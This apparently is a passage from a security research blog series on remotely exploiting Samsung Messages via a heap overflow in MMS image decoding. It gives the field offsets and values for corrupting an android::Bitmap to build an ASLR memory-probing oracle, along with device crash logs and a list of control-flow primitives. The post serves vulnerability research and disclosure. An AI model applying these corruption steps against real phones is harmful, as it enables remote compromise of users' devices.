Lifetime of a Bitmap

When we dig into the Java code, it becomes evident that the lifetime of the Bitmap object is somewhat complex, and it may be subjected to a few transformations. Let's take it step by step:

  1. The initial Bitmap is created through BitmapFactory.decodeStream call   ImageUtil.loadBitmapFromStream:

    Initial BitmapFactory.decodeStream call

  2. The bitmap is then subjected to scaling:

    Scaling the bitmap to width

  3. The scaling is in fact optional, and only happens if the bitmap dimensions are greater than the intended ones:

    Decompiled scaleToWidth function

  4. Lastly, in the com.samsung.android.messaging.ui.model.l.at.a method, if the bitmap configuration is not ARGB_8888, it is converted to such encoding:

    Loading and converting the bitmap in Samsung Messages code

In a nutshell, step 1 is where the bitmap is allocated, decoded, and overflown, and steps 2 and 3 are where the corrupted object is used, and where we should look for the desired ASLR oracle primitive.

I spent quite some time looking at the image-related Skia code and experimenting with various values of the Bitmap fields. Eventually, I discovered a perfect technique for probing arbitrary addresses to check if they are readable. The primitive is located in step 3 (bitmap conversion to ARGB_8888), so the first order of business is to disable the scaling in step 2. Assuming that we're starting off with a blob of 160 bytes 0x41 again, we should adjust:

  • fWidth (offset 0x0c) → 0x1
  • fHeight (offset 0x10) → 0x1

While we're at it, it will make our life easier later if we make the second set of dimensions sane too:

  • mInfo.fWidth (offset 0x60) → 0x1
  • mInfo.fHeight (offset 0x64) → 0x1

Then, we need to make sure that we pass the rowBytes checks (1, 2) in SkBitmap::setInfo by setting it to a sensible value:

  • fRowBytes (offset 0x20) → 0x1000

If mInfo.fColorSpace is non-NULL, it will be dereferenced, so we have to zero it out:

  • mInfo.fColorSpace (offset 0x58) → 0x0

This gets us past the copying/sanity checking of the basic properties of the bitmap, and into the pixel copying logic under android.graphics.Bitmap.copyBitmap_copybitmapCopyToSkPixmap::readPixelsSkConvertPixelsswizzle_or_premul. To be able to use the swizzle_or_premul conversion routine, the color type needs to be either RGBA_8888 (4) or BGRA_8888 (6), and since it cannot be the former due to the Bitmap.Config check in Java code, there is only one option left:

  • mInfo.fColorType (offset 0x68) → 0x6

Finally, we arrive at the following loop:

62:    for (int y = 0; y < dstInfo.height(); y++) {
63:        SkOpts::RGBA_to_BGRA((uint32_t*)dstPixels, (const uint32_t*)srcPixels, dstInfo.width());
64:        dstPixels = SkTAddOffset<void>(dstPixels, dstRB);
65:        srcPixels = SkTAddOffset<const void>(srcPixels, srcRB);
66:    }

That's where the BGRA to RGBA conversion takes place. In the above snippet, the values of most variables originate from the overwritten android::Bitmap object:

  • dstInfo.height() == mInfo.height
  • dstInfo.width() == mInfo.width
  • srcPixels == fPixels
  • srcRB == fRowBytes

So in other words, for each row of the bitmap, the code copies width×4 bytes from a controlled pointer, and moves the pointer by fRowBytes. This is also illustrated below:

This conversion logic gives us enormous flexibility in terms of the addresses we can trigger accesses to, and importantly, the data being read is just pixel colors, which are completely neutral to the control flow of the code. In the most basic scenario, we can leave the current state of the corrupted fields and make just two more changes:

  • fPixels (offset 0x18) → start of the probed address range
  • mInfo.fHeight (offset 0x64) → number of pages to probe

This will cause Skia to read four bytes in 0x1000 byte intervals, in mInfo.fHeight iterations, starting from the fPixels address. It is equivalent to probing the readability of an arbitrary continuous memory area – if all pages are mapped and readable, the loop will complete successfully and the app will stay alive; otherwise, it will crash while trying to access the first non-readable page in the tested range.

As always, we should confirm the behavior on a real device. We can start off with setting fPixels to an invalid address such as 0xccc...ccc, and sending the sample via MMS:

Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xcccccccccccccccc in tid 1101 (pool-8-thread-1), pid 848 (droid.messaging)
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
[...]

backtrace:
      #00 pc 00000000006fb210  /system/lib64/libhwui.so (neon::RGBA_to_BGRA(unsigned int*, unsigned int const*, int)+96)
      #01 pc 00000000003b5410  /system/lib64/libhwui.so (_ZL17swizzle_or_premulRK11SkImageInfoPvmS1_PKvmRK22SkColorSpaceXformSteps.llvm.9990621564539140211+208)
      #02 pc 00000000003b5114  /system/lib64/libhwui.so (SkConvertPixels(SkImageInfo const&, void*, unsigned long, SkImageInfo const&, void const*, unsigned long)+156)
      #03 pc 00000000004f26c0  /system/lib64/libhwui.so (SkPixmap::readPixels(SkImageInfo const&, void*, unsigned long, int, int) const+312)
      #04 pc 0000000000185fb8  /system/lib64/libandroid_runtime.so (bitmapCopyTo(SkBitmap*, SkColorType, SkBitmap const&, SkBitmap::Allocator*)+384)
      #05 pc 000000000018397c  /system/lib64/libandroid_runtime.so (Bitmap_copy(_JNIEnv*, _jobject*, long, int, unsigned char)+284)
[...]

A sigsegv is indeed generated upon a read from the bad address in the color conversion function. Let's try something more complex. On my test device, the last mapping in the address space of the com.samsung.android.messaging process is a stack:

7fdf319000-7fdfb18000 rw-p 00000000 00:00 0                              [stack]

To verify that our oracle primitive touches each page in the given area, we can set fPixels to 0x7fdfb10000 (eight pages before the end of the stack), and mInfo.fHeight to 10. As a result, we should see the following crash:

Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x7fdfb18000 in tid 1630 (pool-8-thread-1), pid 1500 (droid.messaging)

The fault address lies directly after the stack mapping, which indicates that the loop successfully executed eight iterations, and failed during the ninth, when it went out of bounds. This completes our quest for a suitable ASLR oracle primitive, as it ultimately shows that we can now remotely trigger memory reads of a highly-controllable set of addresses in the context of the attacked Messages app.

Summary

To recap, we have analyzed the available memory corruption bugs based on pseudo-ASAN crash reports, and decided to work with a linear heap overflow present in RLE decompression. The overflown buffer is a pixel storage allocation associated with an android::Bitmap object, and thanks to some useful jemalloc properties (determinism, size bins, lack of inline metadata), we found a way to reliably corrupt the relevant Bitmap object itself.

The Bitmap class is non-trivial, and it provides a variety of useful primitives when corrupted. In order to hijack the control flow, we can provoke a call from an arbitrary vtable pointer, or cause a direct call to a controlled function pointer with two arguments, if we know the address of libhwui.so. Furthermore, in the context of a potential ASLR bypass, we can prompt accesses from a controlled memory range, which may trigger a crash or not depending on the readability of the region. This is as good as we're going to get with regards to low-level exploitation capabilities.

With solid foundations laid down for the attack, we can shift our attention to some important higher level issues, such as:

  • How to programmatically send MMS messages?
  • How to (ab)use the MMS protocol to leak information on whether the Messages app crashed upon the receipt of a message?
  • Even with the presence of a potential side channel, how to disclose the full addresses of data and/or code in an effective and timely manner?
  • Finally, how to convert the currently known RCE primitives to achieve actual arbitrary code execution?

Finding the answers to these questions will be the subject of the upcoming blog posts in the series.

No comments:

Post a Comment